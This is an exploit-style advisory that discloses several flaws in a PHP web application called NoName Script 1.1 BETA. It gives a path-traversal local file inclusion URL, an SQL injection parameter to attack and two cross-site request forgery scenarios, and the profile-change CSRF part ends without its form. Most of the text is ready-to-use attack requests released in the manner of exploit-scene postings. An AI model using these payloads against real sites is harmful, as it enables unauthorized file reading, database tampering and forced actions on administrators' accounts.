[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabilities
[ ] Discovered By SirGod
[ ] www.mortal-team.org
[ ] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
################################################################################# [ ] Local File Inclusion http://localhost/index.php?action=../../../autoexec.bat &kategorie=Tutorial
This will open autoexec.bat . [ ] SQL Injection http://localhost/index.php?action=newsadmindel&file_id=[SQL]
[ ] Cross Site Request Forgery If an logged in user with administrative permisions will click the following link ,he will be logged out. http://localhost/logout.php [ ] Cross Site Request Forgery - Change User Profile If an logged in user with administrative permisions will click the following link the following action will be executed. What to change :
- form action and profil_id :
#################################################################################